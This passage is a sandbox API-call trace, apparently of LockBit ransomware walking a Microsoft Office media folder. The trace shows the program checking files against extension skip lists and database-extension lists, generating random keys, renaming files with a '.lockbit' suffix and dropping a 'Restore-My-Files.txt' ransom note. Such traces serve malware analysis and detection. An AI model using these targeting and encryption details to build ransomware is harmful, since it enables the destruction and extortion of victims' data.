Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.967] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.967] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aace000, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd408600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4aace000, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115840.GIF", cAlternateFileName="")) returned 1 [0204.967] lstrcmpiW (lpString1=".", lpString2="J0115840.GIF") returned -1 [0204.967] lstrcmpiW (lpString1="..", lpString2="J0115840.GIF") returned -1 [0204.967] PathFindExtensionW (pszPath="J0115840.GIF") returned=".GIF" [0204.967] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.967] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.967] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.967] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.967] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.967] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.967] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.967] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.967] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.968] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.968] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.968] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.968] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.968] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.968] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.968] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.968] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.968] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.969] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115840.GIF") returned 1 [0204.969] lstrcmpiW (lpString1="ntldr", lpString2="J0115840.GIF") returned 1 [0204.969] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115840.GIF") returned 1 [0204.969] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115840.GIF") returned -1 [0204.969] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115840.GIF") returned -1 [0204.969] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115840.GIF") returned 1 [0204.969] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115840.GIF") returned -1 [0204.969] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.969] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF") returned=".GIF" [0204.969] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.969] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.969] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.969] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.969] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.969] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.969] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.970] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.970] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.970] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.970] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.970] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.970] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.970] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.970] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.970] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.970] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF.lockbit") returned 78 [0204.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115840.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.972] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.972] malloc (_Size=0x40068) returned 0x3df0008 [0204.972] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=190) returned 1 [0204.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.973] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.977] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.977] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.978] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.978] free (_Block=0x1fa2ed8) [0204.978] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115840.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.978] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.978] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.978] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aace000, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd408600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4aace000, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115841.GIF", cAlternateFileName="")) returned 1 [0204.978] lstrcmpiW (lpString1=".", lpString2="J0115841.GIF") returned -1 [0204.978] lstrcmpiW (lpString1="..", lpString2="J0115841.GIF") returned -1 [0204.978] PathFindExtensionW (pszPath="J0115841.GIF") returned=".GIF" [0204.978] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.978] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.978] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.978] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.978] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.978] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.978] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.978] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.978] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.978] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.978] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.978] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.978] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.978] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.978] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.979] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.979] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.979] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.979] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.979] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.979] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.979] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.980] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.980] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.980] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.980] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.980] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115841.GIF") returned 1 [0204.980] lstrcmpiW (lpString1="ntldr", lpString2="J0115841.GIF") returned 1 [0204.980] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115841.GIF") returned 1 [0204.980] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115841.GIF") returned -1 [0204.980] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115841.GIF") returned -1 [0204.980] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115841.GIF") returned 1 [0204.980] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115841.GIF") returned -1 [0204.980] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.980] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF") returned=".GIF" [0204.980] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.980] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.980] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.980] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.981] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.981] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.981] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF.lockbit") returned 78 [0204.981] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115841.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.983] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.983] malloc (_Size=0x40068) returned 0x3df0008 [0204.983] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=177) returned 1 [0204.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.983] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.984] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.988] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.988] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.988] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.988] free (_Block=0x1fa2ed8) [0204.988] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115841.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.988] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.988] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aace000, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd408600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4aace000, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115842.GIF", cAlternateFileName="")) returned 1 [0204.988] lstrcmpiW (lpString1=".", lpString2="J0115842.GIF") returned -1 [0204.988] lstrcmpiW (lpString1="..", lpString2="J0115842.GIF") returned -1 [0204.988] PathFindExtensionW (pszPath="J0115842.GIF") returned=".GIF" [0204.988] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.988] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.988] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.988] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.988] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.988] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.989] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.989] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.989] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.989] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.989] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.989] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.989] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.989] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.989] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.990] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.990] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.991] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115842.GIF") returned 1 [0204.991] lstrcmpiW (lpString1="ntldr", lpString2="J0115842.GIF") returned 1 [0204.991] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115842.GIF") returned 1 [0204.991] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115842.GIF") returned -1 [0204.991] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115842.GIF") returned -1 [0204.991] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115842.GIF") returned 1 [0204.991] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115842.GIF") returned -1 [0204.991] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.991] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115842.GIF") returned=".GIF" [0204.991] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.991] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.991] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.991] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.991] 